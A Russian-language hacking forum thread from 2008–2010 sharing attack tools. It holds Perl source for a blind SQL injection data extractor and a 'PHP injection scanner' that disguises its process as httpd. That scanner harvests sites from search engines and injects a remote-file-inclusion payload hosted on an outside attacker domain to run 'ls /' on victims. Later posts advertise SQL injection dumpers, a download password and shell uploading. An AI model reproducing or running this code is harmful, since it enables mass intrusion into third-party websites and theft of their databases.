    chomp($columna);
                print 
    "[!] Extracting values from table $tabla and column $columna (Could take a long time)...\n\n";
                print 
    WEB "\n\n[Values of table $tabla and column $columna]:\n\n";
                
    $search 1;
                
    $posicion 1;
                
    $limit 0;
                
    $comprob 1;
                while (
    $search <= 255)
                {
                   
    $sql=$ARGV[0]." AND ascii(substring((SELECT " .$columna" FROM " .$tabla." limit " .$limit.",1),".$posicion.",1)) = " .$search;
                   
    $response=get($sql);
                   if (
    $response =~ /$ARGV[1]/)
                      {
                           
    $char chr($search);
                           print 
    WEB "$char";
                           print 
    "$char";
                          
    $search 0;
                          
    $posicion++;
                          
    $comprob++;
                      }
                     if (
    $search == 255)
                     {
                        print 
    "\n";
                        print 
    WEB "\n";
                        if (
    $comprob == 1)
                        {
                           
    $eleccion '';
                           print 
    "[+] Search finished. Want to extract value from another column? [Y/N]: ";
                           
    $eleccion.=<STDIN>;
                           
    chomp($eleccion);
                           if (
    $eleccion =~ /Y/)
                           {
                              goto 
    extrac;
                           }
                           else
                           {
                              
    end();
                           }
                        }
                        
    $comprob 1;
                        
    $search 0;
                        
    $limit++;
                     }
                   
    $search++;
                }
               }
    end();
    PHP injection scanner 5.0 [perl]
    PHP:
    #!/usr/bin/perl

    use LWP::Simple;
    use 
    IO::Socket::INET;



    print 
    "nnnnnnnnnnnnnnnnnn";
    print 
    "t[ PHP injection scanner 5.0 priv8 version by poerschke ]nt[ irc.gigachat.net #spykids ]nnn";

    if(!@
    ARGV[0]){
    print 
    "t[ use: perl php5.0.pl <procura> ]nn";
    exit;
    }
    print 
    "t[ Camuflando pid ]n";
    my $processo "/usr/local/sbin/httpd - spy";
    $SIG{"INT"} = "IGNORE";
    $SIG{"HUP"} = "IGNORE";
    $SIG{"TERM"} = "IGNORE";
    $SIG{"CHLD"} = "IGNORE";
    $SIG{"PS"} = "IGNORE";

    $
    0="$processo"."0"x16;;
    my $pid=fork;
    exit if 
    $pid;
    die 
    "Problema com o fork: $!" unless defined($pid);

    print 
    "t[ Pid: $pid Processo: $processo ]n";

    $caxe ".";
    $caxe1 ".";
    $caxe .= rand(9999);
    $caxe1 .= rand(9999);
    $arq ".";
    $arq int rand(9999);

    open(sites,">$arq");
    print 
    sites "";
    close(sites);


    $procura = @ARGV[0];
    chomp $procura;
    print 
    "t[ Procurando por $procura no Google ]n";
    for(
    $n=0;$n<900;$n += 10){
    $sock IO::Socket::INET->new(PeerAddr => "www.google.com.br"PeerPort => 80Proto => "tcp") or next;
    print 
    $sock "GET /search?q=$procura&start=$n HTTP/1.0nn";
    print 
    $sock "Host: www.google.com.br";
    print 
    $sock "User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; pt-BR; rv:1.0.1) Gecko/20020823 Netscape/7.0";
    print 
    $sock "Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,video/x-mng,image/png,image/jpeg,image/gif;q=0.2,text/css,*/*;q=0.1";
    print 
    $sock "Accept-Language: pt-br, pt;q=0.50";
    print 
    $sock "Accept-Encoding: gzip, deflate, compress;q=0.9";
    print 
    $sock "Accept-Charset: ISO-8859-1, utf-8;q=0.66, *;q=0.66";
    print 
    $sock "Keep-Alive: 300";
    print 
    $sock "Connection: keep-alive";

    @
    resu = <$sock>;
    close($sock);
    $ae "@resu";
    while (
    $ae=~ m/<a href=.*?>.*?</a>/){
    $ae=~ s/<a href=(.*?)>.*?</a>/$1/;
    $uber=$1;
    if ($uber !~/translate/)
    {
    if ($uber !~ /cache/)
    {
    if ($uber !~ /"/)
    {
    if ($uber !~ /google/)
    {
    if ($uber !~ /216/)
    {
    if ($uber =~/http/)
    {
    if ($uber !~ /start=/)
    {
    open(arq,">>$arq");
    print arq "$ubern";
    close(arq);
    }}}}}}}}}
    print "t[ Procurando por $procura no Cade ]n";

    for($cadenu=1;$cadenu <= 991; $cadenu +=10){

    @cade = get("http://cade.search.yahoo.com/search?p=$procura&ei=UTF-8&fl=0&all=1&pstart=1&b=$cadenu") or next;
    $ae = "@cade";

    while ($ae=~ m/<em class=yschurl>.*?</em>/){
    $ae=~ s/<em class=yschurl>(.*?)</em>/$1/;
    $uber=$1;

    $uber =~ s/ //g;
    $uber =~ s/<b>//g;
    $uber =~ s/</b>//g;

    open(a,">>$arq");
    print a "$ubern";
    close(a);
    }}
    print "t[ Pronto sites pegos no google e cade ]n";
    print "t[ Excluindo os sites repetidos ]n";
    $ark = $arq;
    @si = "";
    open (arquivo,"<$ark");
    @si = <arquivo>;
    close(arquivo);
    $novo ="";
    foreach (@si){
    if (!$si{$_})
    {
    $novo .= $_;
    $si{$_} = 1;
    }
    }
    open (arquivo,">$ark");
    print arquivo $novo;
    close(arquivo);


    $a =0;
    $b =0;
    open(ae,"<$arq");
    while(<ae>)
    {$sites[$a] = $_;
    chomp $sites[$a];
    $a++;
    $b++;}
    close(ae);
    print "t[ Total de sites para scanear: $a ]n";
    for ($a=0;$a<=$b;$a++){
    open (file, ">$caxe");
    print file "";
    close(file);
    open (file, ">$caxe1");
    print file "";
    close(file);
    $k=0;
    $e=0;
    $data=get($sites[$a]) or next;
    while($data=~ m/<a href=".*?">.*?</a>/){
    $data=~ s/<a href="(.*?)">.*?</a>/$1/;
    $ubersite=$1;

    if ($ubersite =~/"/)
    {
    $nu = index $ubersite, '"';
    $ubersite = substr($ubersite,0,$nu);
    }
    if ($ubersite !~/http/)
    {$ubersite = $sites[$a].'/'.$ubersite;}
    open(file,">>$caxe") || die("nao abriu caxe.txt $!");
    print file "$ubersiten";
    close(file);
    }

    $lista1 = 'http://www.spykidsgroup.com/spy.gif?&cmd=ls%20/';
    $t =0;
    $y =0;
    @ja;
    open(opa,"<$caxe") or die "nao deu pra abrir o arquivo caxe.txt";
    while (<opa>)
    {
    $ja[$t] = $_;
    chomp $ja[$t];
    $t++;
    $y++;
    }
    close(opa);
    $t=1;
    while ($t < $y)
    {
    if ($ja[$t] =~/=/)
    {
    $num = rindex $ja[$t], '=';
    $num += 1;
    $ja[$t] = substr($ja[$t],0,$num);
    open (jaera,">>$caxe1") or die "nao deu pra abrir ou criar caxe1.txt";
    print jaera "$ja[$t]$lista1n";
    close(jaera);
    $num = index $ja[$t], '=';
    $num += 1;
    $ja[$t] = substr($ja[$t],0,$num);
    $num1 = rindex $ja[$t], '.';
    $subproc = substr($ja[$t],$num1,$num);

    open (jaera,">>$caxe1") or die "nao deu pra abrir ou criar caxe1.txt";
    print jaera "$ja[$t]$lista1n";
    close(jaera);
    }
    $t++;
    }
    $ark = "$caxe1";
    @si = "";
    open (arquivo,"<$ark");
    @si = <arquivo>;
    close(arquivo);
    $novo ="";
    foreach (@si){
    if (!$si{$_})
    {
    $novo .= $_;
    $si{$_} = 1;
    }
    }
    open (arquivo,">$ark");
    print arquivo $novo;
    close(arquivo);
    $q=0;
    $w=0;
    @hot;
    open (ops,"<$caxe1");
    while(<ops>)
    {
    $hot[$q] = $_;
    chomp $hot[$q];
    $q++;
    $w++;
    }
    close(ops);
    print "t[ Come?§ando o scan aguarde. Pode demorar horas. ]n";
    for($q=0;$q<=$w;$q++)
    {

    if ($hot[$q] =~/http/)
    {
    $tipo=get($hot[$q]) or next;
    if($tipo =~/root/)
    {
    if ($tipo =~/etc/)
    {
    if ($tipo =~/boot/)
    {
    open(a,">>res.txt");
    print a "$hot[$q]n";
    close(a);
    }}}}}}

    print "t[ Pronto scanner concluido ]n";
    print "t[ O resultado foi salvo no ftp do spykids ]n";
    LFI Fuzz | reiluke
    [​IMG]
    Скачать
    pass: kisskissbangbang
     
    14 ноя 2008
    1 человеку нравится это.
  8. faza02
    faza02 Никто Новичок
    Симпатии:
    87
    29 ноя 2008
  9. faza02
    faza02 Никто Новичок
    Симпатии:
    87
    30 ноя 2008
  10. faza02
    faza02 Никто Новичок
    Симпатии:
    87
    Последнее редактирование: 30 ноя 2008
    30 ноя 2008
    1 человеку нравится это.
  11. faza02
    faza02 Никто Новичок
    Симпатии:
    87
    13 дек 2008
  12. faza02
    faza02 Никто Новичок
    Симпатии:
    87
    16 дек 2008
    1 человеку нравится это.
  13. faza02
    faza02 Никто Новичок
    Симпатии:
    87
    MySQL Dump V.1 Released


    могу сказать одно - штука отличная, там и сканер скулей, и дампер, пара тулз для кодирования.
    Hidden Content:
    **Hidden Content: To see this hidden content your post count must be 5 or greater.**
     
    19 дек 2008
  14. faza02
    faza02 Никто Новичок
    Симпатии:
    87
    3 янв 2009
  15. faza02
    faza02 Никто Новичок
    Симпатии:
    87
    6 янв 2009
  16. PAPA
    PAPA Продвинутый
    Симпатии:
    7
    1 апр 2009
  17. Mei
    Mei bit of love Продвинутый
    Симпатии:
    214
    SQL Injection Tool - SIPT 4

    SIPT - это новая программа для работы с SQL Инъекциями. Появилось много технический обновлений и изменений внешнего вида. Теперь все выглядит компактно и присутствует множество удобных функций работы с базой данных через узявимость sql injection.

    [​IMG]

    Место куда будут вставляться запросы отмечается {SQLINJ}, то есть если уязвим параметр id, то в URL пишем:
    Код:
    http://localhost/test.php?getid=1{SQLINJ}
    Поддерживается использование proxy. Можно задать таймаут соединения. Програма работает с четвертой и пятой версией MYSQL. С пятой веткой все ок, все колонки и поля выводятся одним кликом, а вот с четвертой нужно помучатся, там есть стандартный словарь таблиц и колонок - можно брутить.. Конешно если повезет и есть file_priv у юзера тогда можно и прочитать конфиг, затем файлы или сразу шелл залить если кавычки не фильтруются. Ну не будем забегать далеко=) всё остальное похоже, сообственно кто знает, тот знает и если захочет разберётся.

    Скачать
     
    1 май 2009
  18. Pin4eG
    Pin4eG Продвинутый
    Симпатии:
    33
    SQL injector v2.0 - Full Automatic

    ################################################## #######
    # SQL INJECTOR V2.0
    ################################################## #######
    # [+] What’s New in this version ?
    # 1/ Evasion choise
    # 2/ proxy support
    # 3/ all previous bugs were fixed
    # 4/ URl Extractor + vuln scanner & checker
    # 5/ More InJeCtIoN OPTIONS
    ################################################## #######
    # Language : PERL
    # Coder : AlpHaNiX
    ################################################## #######

    # Avaible Options :
    –/// MySQL
    MySQL column length calculator MySQL v4/5
    MySQL target website db global infos MySQL v4/5
    MySQL Full Schema Extractor MySQL v5
    MySQL Data Dump MySQL v4/5
    MySQL load_file fuzzer MySQL v4/5
    MySQL Table_name Fuzzer MySQL v4
    MySQL Column_name Fuzzer MySQL v4
    –/// MsSQL
    MsSQL DB global info
    MsSQL Tables Extractor
    MsSQL Columns Extractor
    MsSQL Data Dumper
    –/// Vulunerability Scanner
    URL Extractor , SQL Vulnerability’s Scanner & checker

    [​IMG]

    сорец
     
    21 июн 2009
    1 человеку нравится это.
  19. fatal
    fatal Новичок
    Симпатии:
    0
    спс за софт перезалейте SQL Injector hackz Shop :)
     
    18 мар 2010
  20. Naseem
    Naseem Новичок
    Симпатии:
    0
    thank you
     
    12 апр 2010

Поделиться этой страницей

Загрузка...